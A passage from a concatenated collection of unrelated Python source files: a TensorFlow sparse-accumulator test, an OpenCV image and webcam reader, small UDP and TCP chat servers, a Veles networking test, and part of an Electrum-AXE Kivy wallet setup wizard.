# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1, 2, 3]))
takeg_t = q.take_indexed_slices_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
@test_util.run_v1_only("b/120545219")
def testNonVectorIndices(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Input indices should be vector but received shape:"):
q.apply_grad(
grad_indices=[[0, 1], [1, 0]],
grad_values=np.array([1, 2]).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testZeroDimensionValues(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(
grad_indices=[0], grad_values=np.array(1).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testWrongNonEmptyInputValues(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
" non-empty input values, got "):
q.apply_grad(
grad_indices=[0, 1],
grad_values=np.array([[0, 1, 1]]).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testDynamicNonVectorIndices(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
x_indices = array_ops.placeholder(dtypes_lib.int64)
x_values = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(grad_indices=x_indices, grad_values=x_values)
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Input indices should be vector but received shape:"):
sess.run(accum_op,
feed_dict={
x_indices: [[0, 1], [1, 0]],
x_values: np.array([1, 2]).astype(np.float32)
})
@test_util.run_v1_only("b/120545219")
def testDynamicWrongNonEmptyInputValues(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
x_indices = array_ops.placeholder(dtypes_lib.int64)
x_values = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(grad_indices=x_indices, grad_values=x_values)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
" non-empty input values, got "):
sess.run(accum_op,
feed_dict={
x_indices: [0, 1],
x_values: np.array([[0, 1, 1]]).astype(np.float32)
})
@test_util.run_v1_only("b/120545219")
def testEmptyShapeApply(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Input indices should be vector"):
q.apply_grad(grad_indices=0, grad_values=[1.0], grad_shape=[]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Input indices should be vector"):
q.apply_grad(grad_indices=0, grad_values=[1.0]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(grad_indices=[0], grad_values=1.0, grad_shape=[]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(grad_indices=[0], grad_values=1.0).run()
# The right way to apply a scalar
q.apply_grad(grad_indices=[0], grad_values=[1.0], grad_shape=[]).run()
q.apply_grad(grad_indices=[0], grad_values=[1.0]).run()
@test_util.run_v1_only("b/120545219")
def testValidateShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[2, 2, None])
# Provided shape has wrong rank
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected shape rank at least 3, got 2"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[1, 2]]).astype(np.float32),
grad_shape=[2, 2]).run()
# Provided shape has wrong dim
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected shape dim 1 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[[1, 2], [3, 4], [5, 6]]]).astype(np.float32),
grad_shape=[2, 3, 2]).run()
# Indices exceeded accumulator's shape's limits
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: index of slice 0 exceeded limits of shape;"
" index is 3 exceeded 2"):
q.apply_grad(
grad_indices=[3],
grad_values=np.array([[[1, 2], [3, 4]]]).astype(np.float32)).run()
# Values' rank does not match shape
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values rank at least 3, got 2"):
q.apply_grad(
grad_indices=[0, 1],
grad_values=np.array([[1, 2], [3, 4]]).astype(np.float32)).run()
# Values' dim does not match shape
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 1 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[1, 2], [3, 4], [5, 6]]]).astype(np.float32)).run()
# First successful gradient creates additional constraints
# Shape will be additionally be constrained to [None,2,2,2] hereafter.
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32)).run()
# Values' rank does not match accumulated gradient
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values rank 4, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[[1, 2], [3, 4]]]).astype(np.float32)).run()
# Values' dim does not match accumulated gradient
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 3 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32)).run()
# After take grad, constraints on accumulated gradient are removed
self.evaluate(q.take_grad(1))
# First successful gradient imposes new constraints.
# Hereafter, shape will additionally constrained to [None,2,2,3]
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32),
local_step=1).run()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 3 to be 3, got 2"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32),
local_step=1).run()
@test_util.run_deprecated_v1
def testReturnShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[2, None])
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32)).run()
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.dense_shape, [2, 2, 2, 2])
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[None, 2])
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32)).run()
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.dense_shape, [-1, 2, 2, 3])
@test_util.run_deprecated_v1
def testApplyGradtInt32IndicesAndShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
accum_op = q.apply_grad(
grad_indices=constant_op.constant(
[0, 2], dtype=dtypes_lib.int32),
grad_values=constant_op.constant(
[[0, 0, 1], [3, 0, 4]], dtype=dtypes_lib.float32),
grad_shape=constant_op.constant(
[3, 3], dtype=dtypes_lib.int32))
accum_op.run()
accum_op = q.apply_indexed_slices_grad(
ops.IndexedSlices(
indices=constant_op.constant(
[0, 2], dtype=dtypes_lib.int32),
values=constant_op.constant(
[[0, 0, 1], [3, 0, 4]], dtype=dtypes_lib.float32),
dense_shape=constant_op.constant(
[3, 3], dtype=dtypes_lib.int32)))
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.indices, [0, 2])
self.assertAllEqual(val.values, [[0, 0, 1], [3, 0, 4]])
self.assertAllEqual(val.dense_shape, [3, 3])
if __name__ == "__main__":
test.main()
|
lib_images_io.py
|
#!/usr/bin/env python
'''
Classes for reading images from video, folder, or web camera,
and for writing images to video file.
Main classes and functions:
* Read:
class ReadFromFolder
class ReadFromVideo
class ReadFromWebcam
* Write:
class VideoWriter
* Display:
class ImageDisplayer
* Test:
def test_ReadFromWebcam
'''
import os
import warnings
import numpy as np
import cv2
import time
import glob
import threading
import queue
import multiprocessing
class ReadFromFolder(object):
''' A image reader class for reading images from a folder.
By default, all files under the folder are considered as image file.
'''
def __init__(self, folder_path):
self.filenames = sorted(glob.glob(folder_path + "/*"))
self.cnt_imgs = 0
self.cur_filename = ""
def read_image(self):
if self.cnt_imgs >= len(self.filenames):
return None
self.cur_filename = self.filenames[self.cnt_imgs]
img = cv2.imread(self.cur_filename, cv2.IMREAD_UNCHANGED)
self.cnt_imgs += 1
return img
def __len__(self):
return len(self.filenames)
def has_image(self):
return self.cnt_imgs < len(self.filenames)
def stop(self):
None
class ReadFromVideo(object):
def __init__(self, video_path, sample_interval=1):
''' A video reader class for reading video frames from video.
Arguments:
video_path
sample_interval {int}: sample every kth image.
'''
if not os.path.exists(video_path):
raise IOError("Video not exist: " + video_path)
assert isinstance(sample_interval, int) and sample_interval >= 1
self.cnt_imgs = 0
self._is_stoped = False
self._video = cv2.VideoCapture(video_path)
ret, image = self._video.read()
self._next_image = image
self._sample_interval = sample_interval
self._fps = self.get_fps()
if not self._fps >= 0.0001:
import warnings
warnings.warn("Invalid fps of video: {}".format(video_path))
def has_image(self):
return self._next_image is not None
def get_curr_video_time(self):
return 1.0 / self._fps * self.cnt_imgs
def read_image(self):
image = self._next_image
for i in range(self._sample_interval):
if self._video.isOpened():
ret, frame = self._video.read()
self._next_image = frame
else:
self._next_image = None
break
self.cnt_imgs += 1
return image
def stop(self):
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def get_fps(self):
# Find OpenCV version
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# With webcam get(CV_CAP_PROP_FPS) does not work.
# Let's see for ourselves.
# Get video properties
if int(major_ver) < 3:
fps = self._video.get(cv2.cv.CV_CAP_PROP_FPS)
else:
fps = self._video.get(cv2.CAP_PROP_FPS)
return fps
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from web camera.
Argument:
max_framerate {float}: the real framerate will be reduced below this value.
webcam_idx {int}: index of the web camera on your laptop. It should be 0 by default.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
self._is_stoped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
return True # The web camera always has new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
class VideoWriter(object):
def __init__(self, video_path, framerate):
# -- Settings
self._video_path = video_path
self._framerate = framerate
# -- Variables
self._cnt_img = 0
# initialize later when the 1st image comes
self._video_writer = None
self._width = None
self._height = None
# -- Create output folder
folder = os.path.dirname(video_path)
if not os.path.exists(folder):
os.makedirs(folder)
video_path
def write(self, img):
self._cnt_img += 1
if self._cnt_img == 1: # initialize the video writer
#fourcc = cv2.VideoWriter_fourcc(*'XVID') # define the codec
#fourcc = cv2.VideoWriter_fourcc('M','J','P','G') #above code not always working in windows
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
#fourcc = cv2.VideoWriter_fourcc(*'VP90')
#fourcc = cv2.VideoWriter_fourcc(*'H264')
#fourcc = cv2.VideoWriter_fourcc(*'MPEG')
self._width = img.shape[1]
self._height = img.shape[0]
self._video_writer = cv2.VideoWriter(
self._video_path, fourcc, self._framerate, (self._width, self._height))
self._video_writer.write(img)
def stop(self):
self.__del__()
def __del__(self):
if self._cnt_img > 0:
self._video_writer.release()
print("Complete writing {}fps and {}s video to {}".format(
self._framerate, self._cnt_img/self._framerate, self._video_path))
class ImageDisplayer(object):
''' A simple wrapper of using cv2.imshow to display image '''
def __init__(self):
self._window_name = "cv2_display_window"
cv2.namedWindow(self._window_name, cv2.WINDOW_NORMAL)
def display(self, image, wait_key_ms=1):
cv2.imshow(self._window_name, image)
cv2.waitKey(wait_key_ms)
def __del__(self):
cv2.destroyWindow(self._window_name)
def test_ReadFromWebcam():
''' Test the class ReadFromWebcam '''
webcam_reader = ReadFromWebcam(max_framerate=10)
img_displayer = ImageDisplayer()
import itertools
for i in itertools.count():
img = webcam_reader.read_image()
if img is None:
break
print(f"Read {i}th image...")
img_displayer.display(img)
print("Program ends")
if __name__ == "__main__":
test_ReadFromWebcam()
|
server.py
|
#!/usr/bin/env python
import sys
sys.path.append("../")
import logging
import time
import uhej_server
import socket
import threading
import os
logger = logging.getLogger()
PORT = 5000
sock = None
def log_init(level):
logger.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
def open_socket(port):
s = None
while s == None:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
except socket.error as e:
logger.info("Socket in use")
return s
def service_thread():
global sock
while 1:
if sock == None:
time.sleep(1)
else:
try:
data, addr = sock.recvfrom(1024)
port = addr[1]
addr = addr[0]
logger.info("Got message: '%s' from %s" % (data.decode("utf-8"), addr))
except socket.error as e:
print("sock error"), e
thread = threading.Thread(target = service_thread)
thread.daemon = True
thread.start()
log_init(logging.INFO);
logger.info("Server starting")
#os.environ['TZ'] = 'UTC'
#time.tzset()
uhej_server.init()
if 1:
logger.info("Service on %s:%d" % (uhej_server.get_local_ip(), PORT))
sock = open_socket(PORT)
uhej_server.announce_udp("test service", PORT)
uhej_server.announce_udp("tftp", 69)
while 1:
time.sleep(10)
else:
counter = 0
while 1:
logger.info("Service on %s:%d" % (uhej_server.get_local_ip(), PORT))
sock = open_socket(PORT)
uhej_server.announce_udp("test service", PORT)
time.sleep(10)
sock.close()
sock = None
uhej_server.cancel("test service")
time.sleep(10)
|
server.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 26 01:00:38 2021
@author: Louis
"""
import socket
from threading import Thread
# server's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 # port we want to use
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize list/set of all connected client's sockets
client_sockets = set()
# create a TCP socket
s = socket.socket()
# make the port as reusable port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to the address we specified
s.bind((SERVER_HOST, SERVER_PORT))
# listen for upcoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keep listening for a message from `cs` socket
Whenever a message is received, broadcast it to all other connected clients
"""
while True:
try:
# keep listening for a message from `cs` socket
msg = cs.recv(1024).decode()
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
client_sockets.remove(cs)
else:
# if we received a message, replace the <SEP>
# token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
# iterate over all connected sockets
for client_socket in client_sockets:
# and send the message
client_socket.send(msg.encode())
while True:
# we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
# add the new connected client to connected sockets
client_sockets.add(client_socket)
# start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
# close client sockets
for cs in client_sockets:
cs.close()
# close server socket
s.close()
|
test_network.py
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 23, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import logging
import threading
import unittest
from six import BytesIO, PY3
from twisted.internet import reactor
from veles.backends import NumpyDevice
import veles.client as client
from veles.txzmq.connection import ZmqConnection
from veles.prng import get as get_rg
import veles.server as server
from veles.tests import DummyLauncher
from veles.workflow import Workflow
class TestWorkflow(Workflow):
job_requested = False
job_done = False
update_applied = False
power_requested = False
job_dropped = False
sync = threading.Event()
def __init__(self, **kwargs):
self._launcher = DummyLauncher()
super(TestWorkflow, self).__init__(self._launcher, **kwargs)
self.is_running = True
self.device = NumpyDevice()
@Workflow.run_timed
@Workflow.method_timed
def generate_data_for_slave(self, slave):
TestWorkflow.job_requested = True
return {'objective': 'win'}
def do_job(self, job, update, callback):
if isinstance(job, dict):
TestWorkflow.job_done = True
callback(job)
@Workflow.run_timed
@Workflow.method_timed
def apply_data_from_slave(self, obj, slave):
if TestWorkflow.update_applied:
TestWorkflow.sync.set()
if isinstance(obj, dict):
TestWorkflow.update_applied = True
return True
return False
def drop_slave(self, slave):
TestWorkflow.job_dropped = True
@property
def computing_power(self):
TestWorkflow.power_requested = True
return 100
@property
def is_slave(self):
return False
@property
def is_master(self):
return False
@property
def is_standalone(self):
return True
def add_ref(self, workflow):
pass
class TestClientServer(unittest.TestCase):
def setUp(self):
self.master = TestWorkflow()
self.slave = TestWorkflow()
self.server = server.Server("127.0.0.1:5050", self.master)
self.client = client.Client("127.0.0.1:5050", self.slave)
self.stopper = threading.Thread(target=self.stop)
self.stopper.start()
self.master.thread_pool.start()
def stop(self):
TestWorkflow.sync.wait(1.0)
reactor.callFromThread(reactor.stop)
def tearDown(self):
pass
def testWork(self):
reactor.run()
self.stopper.join()
self.assertTrue(TestWorkflow.job_requested, "Job was not requested.")
self.assertTrue(TestWorkflow.job_done, "Job was not done.")
self.assertTrue(TestWorkflow.update_applied, "Update was not applied.")
self.assertTrue(TestWorkflow.power_requested,
"Power was not requested.")
self.assertTrue(TestWorkflow.job_dropped,
"Job was not dropped in the end.")
class TestZmqConnection(unittest.TestCase):
def testPicklingUnpickling(self):
class FakeSocket(object):
def __init__(self, bio):
self._bio = bio
@property
def data(self):
return self._bio.getbuffer() if PY3 else self._bio.getvalue()
def send(self, data, *args, **kwargs):
self._bio.write(data)
idata = get_rg().bytes(128000)
bufsize = 4096
for codec in range(4):
socket = FakeSocket(BytesIO())
pickler = ZmqConnection.Pickler(socket,
codec if PY3 else chr(codec))
offset = 0
while (offset < len(idata)):
pickler.write(idata[offset:offset + bufsize])
offset += bufsize
pickler.flush()
print("Codec %d results %d bytes" % (codec, pickler.size))
unpickler = ZmqConnection.Unpickler()
unpickler.codec = codec if PY3 else chr(codec)
odata = socket.data
self.assertEqual(len(odata), pickler.size)
offset = 0
while (offset < len(odata)):
unpickler.consume(odata[offset:offset + bufsize])
offset += bufsize
merged = unpickler.merge_chunks()
self.assertEqual(len(idata), len(merged))
self.assertEqual(idata, merged)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
unittest.main()
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_axe.base_wizard import BaseWizard
from electrum_axe.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_axe.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum_axe/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum_axe/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: (.45, .2, 0, 1) if app.testnet else (.239, .588, .882, 1)
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'AXE ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_axe/gui/kivy/data/fonts/tron/Tr2n.ttf'
Label:
color: root.text_color
text: 'TESTNET' if app.testnet else ''
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_axe/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum_axe/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum_axe/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
